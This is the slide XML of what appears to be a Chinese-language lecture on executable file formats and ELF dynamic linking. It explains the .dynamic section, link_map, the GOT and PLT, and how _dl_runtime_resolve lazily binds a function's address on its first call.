        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="31752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.dynamic</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Shape 819"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="35848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a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="820" name="Shape 820"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="39944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821" name="Shape 821"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="44040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822" name="Shape 822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="28724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addr of .dynamic</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="Shape 823"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="32820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link_map</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="824" name="Shape 824"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="36916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dl_runtime_resolve</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="825" name="Shape 825"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="41012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printf@plt + 6</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Shape 826"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="45108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puts</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="827" name="Shape 827"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="822" idx="1"/>
            <a:endCxn id="818" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2496600" y="3077267"/>
            <a:ext cx="1099600" cy="302800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="828" name="Shape 828"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3196333" y="3069500"/>
            <a:ext cx="345600" cy="1673200"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 66935"/>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829" name="Shape 829"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="820" idx="3"/>
            <a:endCxn id="828" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2496700" y="4189600"/>
            <a:ext cx="699600" cy="9600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="830" name="Shape 830"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1023133" y="2723833"/>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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sections</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="831" name="Shape 831"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4204000" y="2474669"/>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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="832" name="Shape 832"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7238500" y="2626069"/>
            <a:ext cx="4355200" cy="33600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.dynamic section</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提供动态链接相关信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>link_map</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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保存进程载入的动态链接库的链表</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>dl_runtime_resolve</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装载器中用于解析动态链接库中函数的实际地址的函数</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD29D2B-1C97-4DAF-A588-2CE42B37FD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640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Shape 83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call foo@plt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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Shape 83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40" name="Shape 84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41" name="Shape 84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42" name="Shape 84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43" name="Shape 84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44" name="Shape 84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45" name="Shape 84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46" name="Shape 84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47" name="Shape 84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48" name="Shape 84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49" name="Shape 849"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="84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2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F779353E-A0A7-437E-A134-B72A780FA783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="260520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 foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A9BAEC-F32B-4914-B17B-F649B0E298D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5" name="Shape 855"/>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56" name="Shape 856"/>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57" name="Shape 857"/>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58" name="Shape 858"/>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59" name="Shape 859"/>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60" name="Shape 860"/>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61" name="Shape 861"/>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62" name="Shape 862"/>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63" name="Shape 863"/>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64" name="Shape 86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65" name="Shape 86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66" name="Shape 866"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="867"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DAA00084-DE0A-40EA-8523-36C89568360D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="205530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进程首次调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5EEA441-78D2-44A8-A795-4C9EBEA86B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Shape 873"/>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74" name="Shape 874"/>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75" name="Shape 875"/>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876" name="Shape 876"/>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77" name="Shape 877"/>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878" name="Shape 878"/>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79" name="Shape 879"/>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80" name="Shape 880"/>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881" name="Shape 881"/>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82" name="Shape 882"/>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83" name="Shape 883"/>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84" name="Shape 884"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="885"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CA794344-267D-4FE0-8DF1-A45841250A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5633313" y="4865168"/>
            <a:ext cx="4993675"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表项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中的代码立即跳转到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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E78DB2A8-5EDD-46D0-94BA-4BF4BE48C01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Shape 89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93" name="Shape 89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94" name="Shape 894"/>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95" name="Shape 89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96" name="Shape 89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index</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97" name="Shape 897"/>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98" name="Shape 898"/>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99" name="Shape 899"/>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00" name="Shape 900"/>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01" name="Shape 901"/>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02" name="Shape 902"/>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03" name="Shape 903"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="904"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F1790191-4AB8-4659-9DB0-E65588BCFEEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5749224" y="4865168"/>
            <a:ext cx="4241867"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由于进程是第一次调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>故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中记录的地址是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo@plt+1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AB2D06-2237-4AB7-8E49-2509A066979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1" name="Shape 911"/>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12" name="Shape 912"/>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13" name="Shape 913"/>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14" name="Shape 914"/>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15" name="Shape 915"/>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PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="916" name="Shape 916"/>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17" name="Shape 91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18" name="Shape 918"/>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19" name="Shape 919"/>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20" name="Shape 920"/>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21" name="Shape 921"/>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22" name="Shape 922"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="923"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52BC0DDB-ECF4-441A-A8DB-D8BD7B1E0CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="40799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回到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是为了解析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的实际地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A11C1FDF-459D-4272-B9C8-1F81E9B68ED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Shape 929"/>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30" name="Shape 930"/>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31" name="Shape 931"/>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32" name="Shape 932"/>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33" name="Shape 933"/>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34" name="Shape 934"/>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*(GOT+4)</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35" name="Shape 935"/>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36" name="Shape 936"/>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37" name="Shape 937"/>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38" name="Shape 938"/>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39" name="Shape 939"/>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40" name="Shape 940"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="941"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10DBFBC0-7C17-405F-8CE1-4F8E618FA438}"/>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B22BB0E-D4A6-4F57-B09D-D6F516EB704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Shape 94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49" name="Shape 94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50" name="Shape 95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51" name="Shape 95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52" name="Shape 95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53" name="Shape 95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push *(GOT+4)</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999999"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="999999"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Shape 95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55" name="Shape 95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56" name="Shape 95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57" name="Shape 95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58" name="Shape 95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59" name="Shape 959"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="96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9C5040D4-9F54-4527-BBEC-B7656F64A15D}"/>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1AC477A-0898-4657-AC9D-3B230167A3C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7" name="Shape 96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68" name="Shape 96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69" name="Shape 969"/>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970" name="Shape 97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71" name="Shape 97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_fix_up</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ret 0xc</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972" name="Shape 972"/>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73" name="Shape 973"/>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dl_resolve</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="974" name="Shape 97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75" name="Shape 97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9E312383-95D4-4D97-B4D3-4AAE3740E8C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="5121980"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的真正地址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填入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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F405480B-D0E5-47AE-B0FA-89E6DDE0547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614063" y="2541113"/>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什么是可执行文件？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65C167BE-6CF8-47B7-BDF6-E128CAF75988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254623" y="3070530"/>
            <a:ext cx="4628190" cy="1477328"/>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广义：文件中的数据是可执行代码的文件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sh</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py</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狭义：文件中的数据是机器码的文件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.so</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDA3F7BE-97E2-45EB-96FD-D6038C425E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="138201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可执行文件的分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC635983-05CE-49B3-B85F-BFC62741F972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6736560" y="1911432"/>
            <a:ext cx="5194051" cy="4247317"/>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Windows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Portable Executable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.exe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.lib</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Executable and Linkable Format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.so</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13665858-6BB1-40D6-8FDA-C57B57CF3B2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78180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Shape 98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83" name="Shape 98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84" name="Shape 984"/>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985" name="Shape 98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86" name="Shape 98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_fix_up</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ret 0xc</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="987" name="Shape 98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88" name="Shape 988"/>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dl_resolve</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="989" name="Shape 989"/>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90" name="Shape 990"/>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B5119F5D-D863-43DA-84B1-185CF9064524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="4394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此后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中保存的是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zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1795C130-E5EC-42BF-9F84-EE1C6E1ABDA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Shape 99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98" name="Shape 99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99" name="Shape 999"/>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1000" name="Shape 100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01" name="Shape 100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1002" name="Shape 1002"/>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03" name="Shape 1003"/>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04" name="Shape 1004"/>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05" name="Shape 1005"/>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06" name="Shape 1006"/>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07" name="Shape 1007"/>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C92709A-9564-4B8A-BDA3-B65E1FD937C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="222849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进程第二次调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57211A77-E38D-492B-8A1A-EF4BDA9F558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4" name="Shape 1014"/>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1015" name="Shape 1015"/>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1016" name="Shape 1016"/>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a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017" name="Shape 1017"/>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18" name="Shape 1018"/>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1019" name="Shape 1019"/>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20" name="Shape 1020"/>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21" name="Shape 1021"/>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22" name="Shape 1022"/>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23" name="Shape 1023"/>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24" name="Shape 1024"/>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F37C3DA-1CB0-47DA-A3D4-F60FDCC00FAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="4163319"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直接自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没有了第一次的解析地址过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22135E10-5A79-449D-BF7E-D72B55F83A9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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C810022-AA5A-4FC5-8440-52B0537ED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637" y="1018235"/>
            <a:ext cx="8211309" cy="5197277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CFDD52A-423B-4178-954C-FA62A0512EF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564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4" y="589958"/>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48" y="1162600"/>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1208198"/>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31567" y="1680473"/>
            <a:ext cx="5" cy="4317113"/>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525879"/>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2870890"/>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system()</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
